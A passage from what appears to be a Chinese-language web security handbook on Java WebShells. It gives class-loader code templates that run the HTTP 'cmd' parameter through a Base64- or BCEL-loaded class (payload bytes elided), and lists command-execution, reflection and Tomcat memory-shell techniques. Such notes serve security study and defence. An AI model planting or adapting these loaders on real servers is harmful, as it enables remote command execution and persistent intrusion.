5.3.12. WebShell¶
5.3.12.1. BCEL字节码¶
String bcelCode = "...";
response.getOutputStream().write(String.valueOf(new ClassLoader().loadClass(bcelCode).getConstructor(String.class).newInstance(request.getParameter("cmd")).toString()).getBytes());
5.3.12.2. 自定义类加载器¶
response.getOutputStream().write(new ClassLoader() {
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
if (name.contains("shell")) {
return findClass(name);
}
return super.loadClass(name);
}
@Override
protected Class<?> findClass(String name) throws ClassNotFoundException {
try {
byte[] bytes = Base64.getDecoder().decode("...");
PermissionCollection pc = new Permissions();
pc.add(new AllPermission());
ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
return this.defineClass(name, bytes, 0, bytes.length, protectionDomain);
} catch (Exception e) {
e.printStackTrace();
}
return super.findClass(name);
}
}.loadClass("shell").getConstructor(String.class).newInstance(request.getParameter("cmd")).toString().getBytes());
%>
5.3.12.3. 执行命令变式¶
java.lang.ProcessBuilder#start
java.lang.Runtime#exec
TemplatesImpl
5.3.12.4. 基于反射¶
class.forName
MethodAccessor.invoke
Method.invoke
5.3.12.5. 其他Shell变式¶
java.beans.Expression
java.lang.ClassLoader
java.net.URLClassLoader
jdk.nashorn.internal.runtime.ScriptLoader
ObjectInputStream.resolveClass
ScriptEngine.eval
ScriptEngineManager
ToolProvider.getSystemJavaCompiler
5.3.12.6. Tomcat 容器¶
Servlet
Filter
Listener